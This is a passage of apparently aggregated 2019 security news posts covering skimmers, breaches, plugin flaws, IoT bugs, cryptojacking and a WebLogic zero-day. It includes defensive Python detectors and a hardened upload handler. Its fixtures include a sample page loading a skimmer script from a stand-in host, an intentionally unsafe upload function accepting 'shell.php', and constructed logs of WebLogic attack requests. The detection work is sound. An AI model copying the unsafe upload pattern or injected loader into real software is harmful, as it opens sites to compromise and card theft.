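    for src in parser.external:
        host = urlparse(src).hostname  # None for relative (first-party) paths
        if host and host not in allowed_hosts:
            findings.append(f"external script from unexpected host: {host}")
    for body in parser.inline:
        if HEX_ESCAPE_RUN.search(body):
            findings.append("inline script containing a long hex-escaped string")
    return findings


# Constructed checkout page: one legitimate script, then an injected external
# loader and a hex-encoded inline script placed right before </html>, the
# position the post describes.
SAMPLE_PAGE = r"""<html><head>
<script src="https://cdn.shop.example/js/checkout.js"></script>
</head><body>
<form id="checkout"><input name="cc_number"></form>
<script src="//static.skimmer.invalid/loader.js"></script>
<script>var _0x1a = "\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x66\x6f\x72\x6d\x73";</script>
</body></html>"""

if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_PAGE):
        print(finding)
```

The allowlist check matters more than the hex heuristic: the GitHub-hosted skimmer in this case was simply an external script from a host no store should be loading checkout code from, and an inventory of allowed script origins (or a Content Security Policy expressing the same list) catches it regardless of how the payload is encoded.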

Pierluigi Paganini

(SecurityAffairs – GitHub, Magecart skimmer scripts)

The post Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites appeared first on Security Affairs.

Docker Hub Database hacked, 190,000 users impacted

Docker became aware of unauthorized access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

Docker notified its users that an unauthorized entity gained access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

The exposed information included some usernames and hashed passwords, as well as tokens for GitHub and Bitbucket repositories.
The tokens allow development teams to automatically re-build their images on Docker Hub.

The exposure of the tokens could allow an attacker to modify an image and rebuild it, depending on the permissions granted to the token: a typical supply chain attack scenario.

Docker was informed of the unauthorized access to a Hub database on April 25th, 2019.

“On Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data. Upon discovery, we acted quickly to intervene and secure the site.” reads the data breach notice sent to the impacted users via email.

“During a brief period of unauthorized access to a Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.”

The organization confirmed that it has already revoked all the exposed tokens and access keys.

“It is important for developers who used Docker Hub autobuild to check their project’s repositories for unauthorized access,” reads a blog post published by BleepingComputer, which first reported the news. “Even worse, with these notices coming late on a Friday night, developers potentially have a long night ahead of them as they assess their code.”

The text of the data breach notification is available here:

https://news.ycombinator.com/item?id=19763413

Maintainers of the open source project are asking users to change their passwords on Docker Hub and on any other accounts that share the same credentials.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Docker Hub Database hacked, 190,000 users impacted appeared first on Security Affairs.

Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension

WordPress-based eCommerce websites using the WooCommerce plugin are at risk of full compromise due to an unpatched vulnerability.

A WordPress security firm called ‘Plugin Vulnerabilities’ has discovered a critical vulnerability in the WooCommerce Checkout Manager plugin that exposes WordPress-based eCommerce websites to hacking.

The vulnerability affects the WooCommerce Checkout Manager plugin that allows owners of e-commerce websites based on WordPress and running the WooCommerce plugin to customize forms on their checkout pages.

The experts discovered an “arbitrary file upload” vulnerability that can be exploited by unauthenticated, remote attackers when the website has the “Categorize Uploaded Files” option enabled within the WooCommerce Checkout Manager plugin settings.

Currently the plugin is used by more than 60,000 websites.

The company decided to publish the details of the flaw and a proof-of-concept exploit to protest against the maintainers of the WordPress Support forum. It declared that over the years it has tried to report vulnerabilities directly to the WordPress Support forum without success, because the moderators have systematically removed its posts warning the community.

The company is focused on discovering vulnerabilities in popular and widely adopted WordPress plugins.

Analyzing the code, the experts discovered that at line 2084 of the ‘includes/admin.php’ file the application moves specific files to a directory using ‘move_uploaded_file’ without a prior proper check for allowed files.

The vulnerability could be exploited by attackers to execute arbitrary server-side script code in the context of the web server process and compromise the application to access or modify data or gain administrative access.

“If that is enabled then the following code will be used, which allows arbitrary files to be uploaded:” wrote the experts.

[image: woocommerce]

“So a hacker could use that to upload malicious .php files at a location they could then access, as the proof of concept below shows.”

Below is the proof-of-concept released by the experts:

[image: woocommerce]

Even the latest WooCommerce Checkout Manager version 4.2.6 is affected by the flaw.

To mitigate the flaw, the experts suggest that owners of WordPress websites using the WooCommerce Checkout Manager plugin either disable the “Categorize Uploaded Files” option or disable the plugin.
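The defect the experts describe, an upload moved into place without a check of the allowed file types, next to a hardened version of the same handler, written in Python as an added example rather than as the plugin’s own PHP code. `UPLOAD_DIR`, the allowlist of types with their magic bytes, the function names and the sample inputs are assumptions made for this example.

```python
import secrets
from pathlib import PurePosixPath

UPLOAD_DIR = "/var/www/uploads"  # hypothetical storage directory (assumed)

# Hypothetical allowlist for a checkout form: permitted extension -> leading
# bytes ("magic") the file content must start with for that type.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}


class UploadRejected(ValueError):
    """Raised by hardened_store when an upload fails validation."""


def vulnerable_store(filename: str) -> str:
    """The flawed pattern: trust the client-supplied name and move the file unchecked.

    This mirrors a move_uploaded_file call with no allowlist: 'shell.php' is
    accepted as-is and lands under the web root, where the server executes it.
    """
    return f"{UPLOAD_DIR}/{filename}"


def hardened_store(filename: str, content: bytes) -> str:
    """Validate an upload and return the path it would be stored under.

    1. Keep only the base name, so '../' components cannot escape UPLOAD_DIR.
    2. Require every extension (not just the last) to be on the allowlist,
       which rejects double extensions such as 'x.php.png'.
    3. Require the content to start with the magic bytes of the declared type.
    4. Store under a random name, so the client never controls the final path.
    """
    name = PurePosixPath(filename).name
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if not suffixes:
        raise UploadRejected("file has no extension")
    if any(s not in ALLOWED_TYPES for s in suffixes):
        raise UploadRejected(f"extension not allowed: {name}")
    if not content.startswith(ALLOWED_TYPES[suffixes[-1]]):
        raise UploadRejected("content does not match the declared type")
    if b"<?php" in content:  # secondary signal: PHP source inside an 'image'
        raise UploadRejected("embedded PHP open tag")
    return f"{UPLOAD_DIR}/{secrets.token_hex(16)}{suffixes[-1]}"


def is_rejected(filename: str, content: bytes) -> bool:
    """Convenience wrapper: True when hardened_store refuses the upload."""
    try:
        hardened_store(filename, content)
    except UploadRejected:
        return True
    return False


# Constructed sample inputs.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"

if __name__ == "__main__":
    print("vulnerable:", vulnerable_store("shell.php"))
    for fname, data in (("shell.php", PHP_SAMPLE), ("shell.php.png", PNG_SAMPLE),
                        ("fake.png", PHP_SAMPLE), ("../../receipt.png", PNG_SAMPLE)):
        print(f"hardened {fname!r}:", "rejected" if is_rejected(fname, data) else hardened_store(fname, data))
```

The hardened handler also randomizes the stored name and drops directory components, so even an upload that passes every check cannot be placed at a path the uploader chooses; serving the upload directory with script execution disabled is the complementary server-side control that limits the damage if a check is ever bypassed.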

Pierluigi Paganini

(SecurityAffairs – WooCommerce, hacking)

The post Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension appeared first on Security Affairs.

Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices

Experts at Cisco Talos group disclosed a dozen vulnerabilities uncovered in Sierra Wireless AirLink gateways and routers, including several serious flaws.

Researchers at Cisco Talos group disclosed a dozen vulnerabilities affecting Sierra Wireless AirLink gateways and routers, including several serious flaws. Some of the flaws could be exploited to execute arbitrary code, modify passwords, and change system settings.

Sierra Wireless AirLink gateways and routers are widely used in enterprise environments to connect industrial equipment, smart devices, sensors, point-of-sale (PoS) systems, and industrial control systems (ICS).

“Several exploitable vulnerabilities exist in the Sierra Wireless AirLink ES450, an LTE gateway designed for distributed enterprise, such as retail point-of-sale or industrial control systems.” reads the analysis published by Cisco Talos.

“These flaws present a number of attack vectors for a malicious actor, and could allow them to remotely execute code on the victim machine, change the administrator’s password and expose user credentials, among other scenarios.”

Most of the issues reside in ACEManager, the web server included with the ES450. 

Experts discovered three flaws classified as “critical” (CVSS score 9.9) that can be exploited by an attacker to make changes to any system settings and execute arbitrary commands and code. An authenticated attacker could exploit the flaw by sending specially crafted HTTP requests to the targeted device.

Three other flaws, rated as “high severity,” could be exploited by an authenticated attacker to change the user password and obtain plaintext passwords and other sensitive information. One of the issues affects the SNMPD function of the Sierra Wireless AirLink ES450 and can be exploited by attackers to activate hardcoded credentials on a device, resulting in the exposure of a privileged user.

The remaining issues have been classified as “medium severity”; they include cross-site request forgery (CSRF), cross-site scripting (XSS), and information disclosure issues.

At the time of writing, Sierra Wireless has yet to release a security advisory for these vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – IoT, hacking)

The post Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices appeared first on Security Affairs.

Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws

Experts discovered security flaws in the iLnkP2P peer-to-peer (P2P) system that exposes millions of IoT devices to remote attacks.

Security expert Paul Marrapese discovered two serious vulnerabilities in the iLnkP2P P2P system that is developed by the Chinese firm Shenzhen Yunni Technology Company, Inc. The iLnkP2P system allows users to remotely connect to their IoT devices using a mobile phone or a PC. Potentially affected IoT devices include cameras and smart doorbells.

iLnkP2P is widely adopted in devices marketed by several vendors, including Hichip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.

The expert identified over 2 million vulnerable devices exposed online: 39% of them are located in China, 19% in Europe, and 7% in the United States. Roughly 50% of the vulnerable devices are manufactured by the Chinese company Hichip.

The first iLnkP2P flaw tracked as CVE-2019-11219 is an enumeration vulnerability that could be exploited by an attacker to discover devices exposed online. The second issue tracked as CVE-2019-11220 can be exploited by an attacker to intercept connections to vulnerable devices and conduct man-in-the-middle (MitM) attacks.

An attacker could chain the two issues to steal passwords and possibly remotely compromise the devices; the attacker only needs to know the IP address of the P2P server used by the device.

Marrapese also built a proof-of-concept attack to demonstrate how to steal passwords from devices by abusing their built-in “heartbeat” feature, but he will not release it to prevent abuse.

“Upon being connected to a network, iLnkP2P devices will regularly send a heartbeat or “here I am” message to their preconfigured P2P servers and await further instructions.” reported Brian Krebs.

“A P2P server will direct connection requests to the origin of the most recently-received heartbeat message,” Marrapese said. “Simply by knowing a valid device UID, it is possible for an attacker to issue fraudulent heartbeat messages that will supersede any issued by the genuine device. Upon connecting, most clients will immediately attempt to authenticate as an administrative user in plaintext, allowing an attacker to obtain the credentials to the device.”

The expert has attempted to report the flaws to the impacted vendors since January, but he did not receive any response from them. He reported the flaws to the CERT Coordination Center (CERT/CC) at Carnegie Mellon University; the Chinese CERT was also informed of the discovery.

The bad news is that there is no patch to address either issue, and experts believe patches are unlikely to be released soon.

“The nature of these vulnerabilities makes them extremely difficult to remediate for several reasons,” Marrapese wrote. “Software-based remediation is unlikely due to the infeasibility of changing device UIDs, which are permanently assigned during the manufacturing process. Furthermore, even if software patches were issued, the likelihood of most users updating their device firmware is low. Physical device recalls are unlikely as well because of considerable logistical challenges. Shenzhen Yunni Technology is an upstream vendor with inestimable sub-vendors due to the practice of white-labeling and reselling.”

Marrapese recommends discarding vulnerable products; he also suggests restricting access to UDP port 32100 to prevent external connections via P2P.

The researcher published technical details on his discovery here.
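A detection to go with the UDP port 32100 recommendation, as an added example that is not taken from the researcher’s write-up: it reads flow-log lines, reports every internal host that sends UDP datagrams to port 32100 on an external address (the heartbeat traffic to the P2P servers that the post describes), and lists the servers each host talks to. The internal address ranges, the flow-line format and the sample lines are constructed for this example.

```python
import ipaddress
import re
from collections import defaultdict

P2P_UDP_PORT = 32100  # the UDP port the researcher recommends restricting

# Hypothetical address plan for the network being checked (assumed).
INTERNAL_NETS = [
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("10.0.0.0/8"),
]

# Constructed flow-log format: "<timestamp> <src>:<sport> -> <dst>:<dport> <proto> <bytes>".
FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>[A-Za-z]+)\s+(?P<bytes>\d+)$"
)

# Constructed sample: two cameras heart-beating to P2P servers, ordinary HTTPS
# traffic, an internal-only UDP flow, a TCP flow to the same port, and junk.
SAMPLE_FLOWS = """\
2019-04-26T10:00:01Z 192.168.1.20:4523 -> 203.0.113.5:32100 UDP 120
2019-04-26T10:00:02Z 192.168.1.31:4911 -> 203.0.113.5:32100 UDP 118
2019-04-26T10:00:05Z 192.168.1.31:4912 -> 198.51.100.9:32100 UDP 118
2019-04-26T10:00:07Z 192.168.1.40:52110 -> 203.0.113.77:443 TCP 1460
2019-04-26T10:00:09Z 192.168.1.50:32100 -> 192.168.1.20:32100 UDP 64
2019-04-26T10:00:11Z 192.168.1.60:3301 -> 203.0.113.5:32100 TCP 90
this line is not a flow record
"""


def is_internal(addr: str) -> bool:
    """True when the address falls inside one of the assumed internal ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_p2p_heartbeats(lines) -> dict:
    """Map each internal host that sends UDP/32100 to an external address
    to the sorted list of external servers it talks to."""
    talkers = defaultdict(set)
    for line in lines:
        m = FLOW_RE.match(line.strip())
        if not m:
            continue  # malformed or unrelated line
        if m["proto"].upper() != "UDP" or int(m["dport"]) != P2P_UDP_PORT:
            continue
        if is_internal(m["src"]) and not is_internal(m["dst"]):
            talkers[m["src"]].add(m["dst"])
    return {host: sorted(servers) for host, servers in sorted(talkers.items())}


if __name__ == "__main__":
    for host, servers in find_p2p_heartbeats(SAMPLE_FLOWS.splitlines()).items():
        print(f"{host} sends UDP/{P2P_UDP_PORT} heartbeats to: {', '.join(servers)}")
```

Hosts that appear in the output are the candidates for the egress block on UDP 32100 (or for removal from the network) that the researcher recommends; a device that keeps appearing after the rule is in place shows that the rule does not cover the path it actually uses.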

Pierluigi Paganini

(SecurityAffairs – iLnkP2P flaws, IoT)

The post Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws appeared first on Security Affairs.

Beapy Cryptojacking campaign leverages EternalBlue exploit to spread

Security experts uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit.

Security experts at Symantec have uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit to spread a cryptocurrency malware on enterprise networks in Asia.

“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published by Symantec.

“Beapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector.”

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system; it is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that could trigger remote code execution in older versions of Windows (Windows XP to Server 2008 R2).

Every Windows machine running an old vulnerable version that exposes an SMB service is at risk. DOUBLEPULSAR and ETERNALBLUE became available to anyone after the archive of NSA tools was leaked online by the Shadow Brokers hacker group.

Most of the victims are located in China (80%), with the remaining ones in South Korea, Japan, and Vietnam.

The experts first observed the campaign in January; almost all victims are enterprises (98%).

The attack chain starts with a phishing email carrying an Excel document as an attachment; the document downloads the DoublePulsar backdoor, which is used to deliver the EternalBlue exploit.

Once the backdoor is installed, a PowerShell command allows the malware to connect to the command and control server. The malicious code executes more PowerShell scripts before the cryptocurrency miner is downloaded.

Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.

Experts at Symantec also discovered an earlier version of Beapy malware that hit a public-facing web server and that was attempting to spread to connected systems.

This version was coded in C rather than Python, and it also includes both EternalBlue and Mimikatz. The malicious code also leverages other exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.

“In the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.” continues the analysis. “Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C&C server first observed on March 13. Activity targeting this web server continued until early April.”

Experts observed a spike in the activity of Beapy in March:

[image: Beapy malware]

Since the Coinhive cryptocurrency mining service shut down in March, experts have observed a drop in cryptojacking attacks.

Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.

“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”

The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Beapy miner, hacking)

The post Beapy Cryptojacking campaign leverages EternalBlue exploit to spread appeared first on Security Affairs.

Crooks abuse GitHub platform to host phishing kits

Experts at Proofpoint discovered that free code repositories on GitHub have been abused since at least 2017 to host phishing websites.

Researchers at Proofpoint reported that crooks are abusing free code repositories on GitHub to host phishing websites and bypass security defenses. Experts discovered that cybercriminals have been abusing the GitHub service since at least mid-2017.

The phishing websites were hosted on the canonical $github_username.github.io domain. Attackers are using stolen brand graphics to make their pages resemble the brand they were abusing.

“Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical $github_username.github.io domain.” reads the post published by Proofpoint. “threat actors establish a canonical code repository site within the github.io canonical domain that resembles the brand they are abusing.”

Inspecting the lookalike GitHub account used by the crooks, experts could view the files of the phishing kit directly; they noticed that the HTML code is lightly encoded in order to obfuscate the content.


The code sends credentials provided by the users in an HTTP POST request to another compromised site under the control of the attackers.

The phishing kits do not use typical hosted PHP methods because the github.io platform does not provide PHP back-end services.

Experts observed that cybercriminals in some cases used the github.io domain as a traffic redirector with the intent to ensure that the actual phishing page remains live for a bit longer.

The drawback of using public GitHub accounts is that security researchers gain major visibility into the threat actors’ activity and into the changes made to their phishing pages.

Proofpoint identified a particular user, “greecpaid,” who manages several phishing kits hosted on GitHub repositories.

Proofpoint reported its findings to GitHub, which took down the accounts hosting the phishing kits.

“In the past, threat actors have been able to evade detection by using well-known and trusted consumer cloud, social networking, and commerce services to host files as well as web hosts. Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint concludes. 

Pierluigi Paganini

(SecurityAffairs – GitHub, cybercrime)

The post Crooks abuse GitHub platform to host phishing kits appeared first on Security Affairs.

Flaws in Social Warfare plugin actively exploited in the wild

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the popular WordPress plugin Social Warfare.

Social Warfare is a popular WordPress plugin with more than 900,000 downloads; it allows site owners to add social share buttons to a WordPress website.

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the Social Warfare plugin to take control over WordPress websites using it.

At the end of March, experts found a Cross-Site Scripting (XSS) vulnerability in Social Warfare installations (v3.5.1 and v3.5.2) that is actively exploited to add malicious redirects.

Maintainers of Social Warfare for WordPress also addressed a remote code execution (RCE) flaw; both issues were tracked as CVE-2019-9978.

The issue in the WordPress plugin has been fixed with the release of version 3.5.3 of the plugin. On the same day, an unnamed security researcher published technical details of the flaw and a proof-of-concept exploit for the stored Cross-Site Scripting (XSS) vulnerability.

Experts pointed out that attackers can exploit the vulnerabilities to take complete control over websites and servers and use them for malicious purposes, such as mining cryptocurrency or delivering malware.

The availability of the exploit code led attackers to attempt exploiting the vulnerability, but at that stage hackers were only able to inject JavaScript code that redirects users to malicious sites.

Experts at Palo Alto Network discovered several exploits for both vulnerabilities in the wild, including an exploit for the RCE one.

“We also caught several samples exploiting these vulnerabilities in the wild,” reads a blog post published by PaloAlto Network Unit42 researchers. “Figure 5 shows a POST request from one of the samples:”


The root cause of both flaws is the misuse of the is_admin() function in WordPress.

“The root cause of each of these two vulnerabilities is the same: the misuse of the is_admin() function in WordPress,” the researchers say in a blog post. “Is_admin only checks if the requested page is part of admin interface and won’t prevent any unauthorized visit.”

Experts found about 40,000 sites that are using the Social Warfare plugin, most of which are running a vulnerable version.

Vulnerable websites belong to many industries, such as education, finance, and news; experts highlighted that many of these sites receive high traffic.

“There are many exploits in the wild for the Social Warfare plugin and it is likely they will continue to be used maliciously. Since over 75 million websites are using WordPress and many of the high traffic WordPress websites are using the Social Warfare plugin, the users of those websites could be exposed to malware, phishing pages or miners.” concludes PaloAlto Network. “Website administrators should update the Social Warfare plugin to 3.5.3 or newer version.”

Pierluigi Paganini

(SecurityAffairs – WordPress, Social Warfare plugin)

The post Flaws in Social Warfare plugin actively exploited in the wild appeared first on Security Affairs.

A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites

A serious flaw in some of Rockwell Automation’s MicroLogix and CompactLogix PLCs can be exploited by a remote attacker to redirect users to malicious websites.

Some of Rockwell Automation’s MicroLogix and CompactLogix PLCs are affected by a serious vulnerability that can be exploited by a remote attacker to redirect users to malicious websites.

The vulnerability was tracked as CVE-2019-10955 and received a CVSS score of 7.1 (high severity); it affects MicroLogix 1100 and 1400, and CompactLogix 5370 (L1, L2 and L3) controllers.

Both the ICS-CERT and Rockwell Automation published a security advisory.

The flaw is an open redirect vulnerability affecting the web server running on the vulnerable devices. According to the advisory, the web server accepts user input from the PLC’s web interface, and a remote, unauthenticated attacker can inject a malicious link that redirects users from the controller’s web server to a malicious website.

“Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to input a malicious link redirecting users to a malicious website.” reads the advisory published by the US ICS-CERT.

“An open redirect vulnerability could allow a remote unauthenticated attacker to input a malicious link to redirect users to a malicious site that could run or download arbitrary malware on the user’s machine.”


According to the attack scenario described in the security advisory published by Rockwell (available to registered users), the malicious website could be used to deliver malware on the user’s machine.

“This malicious website could potentially run or download arbitrary malware on the user’s machine. The target of this type of attack is not the industrial control device and does not disrupt its control functionality,” reads the advisory published by Rockwell.

Rockwell has released firmware updates that address the vulnerability for the affected controllers. To mitigate the issue it is possible to disable the web server.

Below are the recommendations published by Rockwell Automation to minimize the risk of exploitation of this vulnerability:

  • Update to the latest available firmware revision that addresses the associated risk.
  • Use trusted software, software patches, anti-virus/anti-malware programs, and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

The ICS-CERT credited Josiah Bryan and Giancarlo Palavicini for reporting this vulnerability to NCCIC.

Pierluigi Paganini

(SecurityAffairs – Rockwell, hacking)

The post A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites appeared first on Security Affairs.

Zero-day vulnerability in Oracle WebLogic

Security experts are warning of a dangerous zero-day remote code execution vulnerability that affects the Oracle WebLogic service platform.

Oracle WebLogic wls9_async and wls-wsat components are affected by a deserialization remote command execution zero-day vulnerability.

This zero-day flaw affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.


According to the bulletin CNTA-2019-0015 issued by CNCERT/CC, the flaw affects the WebLogic 10.x and WebLogic 12.1.3 versions. The critical flaw has not yet been addressed by Oracle.

Experts recommend disabling the vulnerable modules “wls9_async_response.war” and “wls-wsat.war”, or blocking access to the URLs “/_async/*” and “/wls-wsat/*” within Oracle WebLogic installs.
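While no patch is available, a defender will also want to know whether anyone has already touched those two URL prefixes. The Python below is an added example (not CNCERT/CC or KnownSec tooling) that scans Combined Log Format access-log lines for requests to /_async/ and /wls-wsat/, normalizing each path first so that encoded, mixed-case or doubled-slash spellings are not missed; the log lines, addresses and trailing path segments are constructed.

```python
"""Hunt an access log for requests to the WebLogic URL prefixes named above.

Added example: the log lines are constructed, not real traffic, and the
check is this example's own, not CNCERT/CC or KnownSec tooling."""
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# The two URL prefixes the advisories say to block access to.
WATCHED_PREFIXES = ("/_async", "/wls-wsat")

# Combined Log Format: ip ident user [time] "METHOD target HTTP/x" status size ...
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)


def normalize_path(target: str) -> str:
    """Canonical request path: query and fragment dropped, percent-decoded
    twice (undoes double encoding), dot-segments and repeated slashes
    collapsed, lower-cased. A raw prefix match would miss '//_async' or
    '/%5Fasync'."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return posixpath.normpath("/" + path.lstrip("/")).lower()


def is_watched(target: str) -> bool:
    norm = normalize_path(target)
    return any(norm == p or norm.startswith(p + "/") for p in WATCHED_PREFIXES)


def parse_line(line: str) -> Optional[Tuple[str, str, str, int]]:
    m = CLF_RE.match(line)
    if m is None:
        return None
    return m.group("ip"), m.group("time"), m.group("target"), int(m.group("status"))


def find_hits(lines: List[str]) -> List[Tuple[str, str, str, int]]:
    """(ip, time, raw target, status) for every request touching a watched
    prefix. The status is kept: a 200 means the module answered, which on an
    unpatched server deserves a closer look than a 404 where it is disabled."""
    return [rec for rec in map(parse_line, lines) if rec and is_watched(rec[2])]


# Constructed sample: timestamps, addresses and trailing path segments are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Apr/2019:10:12:01 +0000] "POST /_async/x HTTP/1.1" 200 512 "-" "curl/7.64.0"',
    '10.0.0.6 - - [26/Apr/2019:10:12:05 +0000] "GET /console/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [26/Apr/2019:10:13:40 +0000] "POST /WLS-WSAT/x?a=1 HTTP/1.1" 500 0 "-" "python-requests/2.21"',
    '10.0.0.8 - - [26/Apr/2019:10:14:02 +0000] "POST //_async//y HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [26/Apr/2019:10:15:17 +0000] "POST /%5Fasync/z HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when, target, status in find_hits(SAMPLE_LOG):
        print(f"{when}  {ip:<10} {status}  {target}")
```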

Experts at KnownSec 404 Team searched for vulnerable instances online by using the ZoomEye search engine, they found 36,173 installs, most of them in the US and China.


Experts at F5 Labs revealed that they had already spotted a campaign exploiting the zero-day flaw in WebLogic servers.

Pierluigi Paganini

(SecurityAffairs – Weblogic, zero-day)

The post Zero-day vulnerability in Oracle WebLogic appeared first on Security Affairs.

The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign

Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.

Introduction

A few days after the publication of our technical article on the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon. The Gamaredon APT was first spotted in 2013; in 2015, researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their “special attention” to Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it leverages a legitimate document of the “State of the Armed Forces of Ukraine” dated 2nd April 2019.

Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

Sha256: 41a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce801410
Threat: Gamaredon Pteranodon stager (SFX file)
Ssdeep: 12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software, with an invalid signature. Its expiration date has been set to the 16th of March 2019.

Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the SFX archive reveals four different files. One of them is a batch file containing the actual infection routine.

Figure 3: Files contained in SFX archive
